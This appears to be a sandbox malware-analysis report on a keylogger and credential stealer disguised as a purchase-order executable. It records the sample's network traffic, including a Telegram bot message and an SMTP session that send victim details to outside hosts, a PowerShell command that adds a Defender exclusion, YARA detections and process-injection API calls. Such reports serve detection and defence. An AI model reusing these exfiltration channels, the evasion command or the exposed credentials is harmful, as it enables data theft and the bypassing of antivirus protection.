2024-10-01 05:21:09 UTC	682	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76100 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TW2sdneDNEPdVqn0Fm%2FoUPyiXnx%2FwSqwVUR5nQcsSLF096snmKpXDJVP%2BFwIS13G3VNnMAk%2Bzpp4ej5u1dj9ZswQpsFXpbppWmbikSTsOYGxS%2FRVTUezVrQGk4bf5A67%2F0mtAk54"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01f3ae6c41f9-EWR
2024-10-01 05:21:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49725	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:10 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 05:21:11 UTC	722	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76102 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q3wnZwJYwjIQwZCfEP%2FglduTrFp%2BXe6k0%2FZHji6xBNl7eiTT9GYk%2F1d5GIXRD%2FHIIfdnO9Jnw6fXTdiAn6u%2F4uvvY%2FJ07zkXasPAxcHPniZZ%2FVepMTL%2BlmGFPS1%2FpNy%2BIn2Ro1J4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01fbbeb8423b-EWR alt-svc: h3=":443"; ma=86400
2024-10-01 05:21:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49727	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:12 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 05:21:12 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76103 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6DbF4Y8sT4u0luxf9SDT%2FeUxwqL5T7RGq4xd%2FM7WSlQbOTTJzdFf4x28S3KXjmfXsYRQJRcR1NaHNtGpLWRCIu4PfyxO8%2Fb4OjQvaaD0GHPsZ0Uvxrgx%2BlwewVte3FXo0wuHBwc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba0203cc038cdd-EWR
2024-10-01 05:21:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49728	149.154.167.220	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:12 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2001/10/2024%20/%2013:45:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-01 05:21:13 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 01 Oct 2024 05:21:13 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-01 05:21:13 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 1, 2024 07:21:19.340508938 CEST	587	49731	208.91.199.223	192.168.2.9	220 us2.outbound.mailhostbox.com ESMTP Postfix
Oct 1, 2024 07:21:19.340838909 CEST	49731	587	192.168.2.9	208.91.199.223	EHLO 813848
Oct 1, 2024 07:21:19.497006893 CEST	587	49731	208.91.199.223	192.168.2.9	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 1, 2024 07:21:19.498248100 CEST	49731	587	192.168.2.9	208.91.199.223	AUTH login bWFrd2FuZGFAaXRjLWliLm5ldA==
Oct 1, 2024 07:21:19.657032013 CEST	587	49731	208.91.199.223	192.168.2.9	334 UGFzc3dvcmQ6
Oct 1, 2024 07:21:19.818244934 CEST	587	49731	208.91.199.223	192.168.2.9	235 2.7.0 Authentication successful
Oct 1, 2024 07:21:19.818667889 CEST	49731	587	192.168.2.9	208.91.199.223	MAIL FROM:<makwanda@itc-ib.net>
Oct 1, 2024 07:21:19.975565910 CEST	587	49731	208.91.199.223	192.168.2.9	250 2.1.0 Ok
Oct 1, 2024 07:21:19.975828886 CEST	49731	587	192.168.2.9	208.91.199.223	RCPT TO:<nsorenseng@gmail.com>
Oct 1, 2024 07:21:20.155404091 CEST	587	49731	208.91.199.223	192.168.2.9	250 2.1.5 Ok
Oct 1, 2024 07:21:20.155590057 CEST	49731	587	192.168.2.9	208.91.199.223	DATA
Oct 1, 2024 07:21:20.314780951 CEST	587	49731	208.91.199.223	192.168.2.9	354 End data with <CR><LF>.<CR><LF>
Oct 1, 2024 07:21:20.315638065 CEST	49731	587	192.168.2.9	208.91.199.223	.
Oct 1, 2024 07:21:20.704895020 CEST	587	49731	208.91.199.223	192.168.2.9	250 2.0.0 Ok: queued as 1446D500A49
Oct 1, 2024 07:22:58.708041906 CEST	49731	587	192.168.2.9	208.91.199.223	QUIT
Oct 1, 2024 07:22:58.975488901 CEST	587	49731	208.91.199.223	192.168.2.9	221 2.0.0 Bye

Target ID:	0
Start time:	01:20:56
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Imagebase:	0x130000
File size:	763'392 bytes
MD5 hash:	89B1330440F5E3CC7FDF662981760845
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:20:57
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Imagebase:	0x630000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:20:57
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:20:57
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Imagebase:	0x440000
File size:	763'392 bytes
MD5 hash:	89B1330440F5E3CC7FDF662981760845
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:20:57
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Imagebase:	0x660000
File size:	763'392 bytes
MD5 hash:	89B1330440F5E3CC7FDF662981760845
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3791088512.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	167
Total number of Limit Nodes:	8

Executed Functions

Function 00B8D030 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B8D0BE
GetCurrentThread.KERNEL32 ref: 00B8D0FB
GetCurrentProcess.KERNEL32 ref: 00B8D138
GetCurrentThreadId.KERNEL32 ref: 00B8D191

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 18d9e063f80d7982c1196076a71916af5343e25a60ba925a4e1cc5665f06cacc
Instruction ID: de2a5ee0bcdccfdd0301b60f4da4c2956032ed64dbd37f3e4ddd807252045792
Opcode Fuzzy Hash: 18d9e063f80d7982c1196076a71916af5343e25a60ba925a4e1cc5665f06cacc
Instruction Fuzzy Hash: 665198B09003498FDB15DFA9D548BEEBBF1EF88300F24849AD009A73A1C774A945CF61

Function 00B8D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B8D0BE
GetCurrentThread.KERNEL32 ref: 00B8D0FB
GetCurrentProcess.KERNEL32 ref: 00B8D138
GetCurrentThreadId.KERNEL32 ref: 00B8D191

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 881438ffb3529141f5916362da59ba9b29aaf51fab19dcb9c8102b7cd740f672
Instruction ID: 8544702710443af408635eebab45721351423b66d9dbf57b3f7f6596866360b1
Opcode Fuzzy Hash: 881438ffb3529141f5916362da59ba9b29aaf51fab19dcb9c8102b7cd740f672
Instruction Fuzzy Hash: 715168B09007498FDB15DFAAD548BDEBBF1EF48314F20849AE409A73A0D774A944CF65

Function 066D49DC Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D4C1E

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2310830748273c2677782d62e57c9c628a1b67d9388958591264799223bdfe18
Instruction ID: 999947dbb30b3a5971bec2ffa9f8ebb4df5403a8bcfa370d4d94acb237f9d460
Opcode Fuzzy Hash: 2310830748273c2677782d62e57c9c628a1b67d9388958591264799223bdfe18
Instruction Fuzzy Hash: 11A14771D003199FEB60DF68C841BEEBBF2AF48314F1485A9E849A7280DB759985CF91

Function 066D49E8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D4C1E

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: eff2fb97cead9c9d7dc2d4f3b2d8be7210b141933cfd76486ac887a1f3cbdd34
Instruction ID: 79bc5419e29473ef981de32857140beb35d6d9876fe957fef3b0529baa8c5e92
Opcode Fuzzy Hash: eff2fb97cead9c9d7dc2d4f3b2d8be7210b141933cfd76486ac887a1f3cbdd34
Instruction Fuzzy Hash: 54913771D007198FEB60DF69C8417EEBBF2FB48314F1485AAE809A7280DB759985CF91

Function 00B8ADA8 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B8AFFE

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e1a6f03937f40e374d1b55f10771a055d48b4f6a3f8c5cf8e21bbd2386c875d0
Instruction ID: 66994abe00b8a1ff75c95e8682da78799caa7e3bf1133e5af1a76763af15fc10
Opcode Fuzzy Hash: e1a6f03937f40e374d1b55f10771a055d48b4f6a3f8c5cf8e21bbd2386c875d0
Instruction Fuzzy Hash: 5D814870A00B058FE724EF29D45579ABBF1FF88304F10896EE44AD7A60D775E849CB91

Function 00B8590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B859C9

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7910a07fd64943e9a0dbe586c5cfbd323a420b93230ceca607f6bb0ffadd8b0b
Instruction ID: bab387dcfd539cedc1a3db0f73ad13a967d962a900d611889aa5a2d1ac37d48e
Opcode Fuzzy Hash: 7910a07fd64943e9a0dbe586c5cfbd323a420b93230ceca607f6bb0ffadd8b0b
Instruction Fuzzy Hash: A041C170C00719CBEB25DFA9C884BDEBBF5BF49704F20816AD409AB261DB756946CF50

Function 00B844C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B859C9

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 473c14e56be6175dcb112f40bd96700ce4205f24d22bdcc414619c51d2371d08
Instruction ID: fbc32bbf4154d7708ab42a0275afbee88e032a92415b758ff1ec349f58dbefc1
Opcode Fuzzy Hash: 473c14e56be6175dcb112f40bd96700ce4205f24d22bdcc414619c51d2371d08
Instruction Fuzzy Hash: 6F41CF70C0071DCBEB24DFA9C8847DEBBF5AF49704F20816AD409AB261DB756945CF90

Function 066D40DA Relevance: 1.6, APIs: 1, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 066D4142

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ac113dc8a68c4273f6dd488abc1e113c13f1ab5b0656a48c8eb5b6a581beeb31
Instruction ID: 5150fb8c7e35965d55bc6b6e808bacf12ecd6f3740eddfff87f16db39a865303
Opcode Fuzzy Hash: ac113dc8a68c4273f6dd488abc1e113c13f1ab5b0656a48c8eb5b6a581beeb31
Instruction Fuzzy Hash: 24217671D002089BDB10DFAAD8457EEBBF9EF88314F14846AD519A7350DB786A40CBE1

Function 066D4758 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D47F0

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7dd38b058de5a23046ed3aeb5b454c57538f468308839f1460e50754edfbafb1
Instruction ID: 511f42fbb554034cccdda9425ee6c1b4ef11d6b29ff056d58b6cd608efa85c86
Opcode Fuzzy Hash: 7dd38b058de5a23046ed3aeb5b454c57538f468308839f1460e50754edfbafb1
Instruction Fuzzy Hash: 962126759103599FDB10CFA9C881BDEBBF5BF48210F14842AE959A7340C7799940CBA1

Function 066D4760 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D47F0

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 47d3d2d7f81f03752aced911c436ff8f43bf97bc1168eee584e8140d75d6170c
Instruction ID: 9e6fa6fb1d49bf44d8070359a5fcbc912ce5c3198d573f71c3788420cb68d885
Opcode Fuzzy Hash: 47d3d2d7f81f03752aced911c436ff8f43bf97bc1168eee584e8140d75d6170c
Instruction Fuzzy Hash: 9D211576D003599FDB10CFAAC885BDEBBF5FF48310F14842AE959A7240C779A954CBA0

Function 066D4848 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D48D0

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8732204df1f56c2b2f80f126684ce10a79778e083a59df8d88cbe13e8043a693
Instruction ID: 786c8880117ea39b59005831f634bbff0b2fa0ce614c3b968d888ee00eaa81b8
Opcode Fuzzy Hash: 8732204df1f56c2b2f80f126684ce10a79778e083a59df8d88cbe13e8043a693
Instruction Fuzzy Hash: 6D212572D002499FDB10CFA9C880BEEBBF1BF48310F14842AE559A7250C7799A50CBA0

Function 066D418A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D420E

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b8bdcd2796cb98df7ffc05c236aca8b4bac4b9d06e764447312538ad4912e028
Instruction ID: 267ae401ced19ddf8f541209b637425a7af553c7a872da8270609be86e7d1dee
Opcode Fuzzy Hash: b8bdcd2796cb98df7ffc05c236aca8b4bac4b9d06e764447312538ad4912e028
Instruction Fuzzy Hash: F4213472D103098FDB10CFAAC8857EEBBF5AF88214F14842ED459A7240CB789A45CFA0

Function 00B8D689 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8D717

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a7076a6b2f2cdfdcf5fcdb8f0681afffff9148f67ed4c9a676f696e8ccda06c7
Instruction ID: e03ab32cbf030d9081b2b10d229a76e5c2a688c0c4dba4b20b2bb5093f52b581
Opcode Fuzzy Hash: a7076a6b2f2cdfdcf5fcdb8f0681afffff9148f67ed4c9a676f696e8ccda06c7
Instruction Fuzzy Hash: 3B21E4B5900249DFDB10CFAAD484AEEBBF5FB48320F14806AE958A3350C374A955CFA0

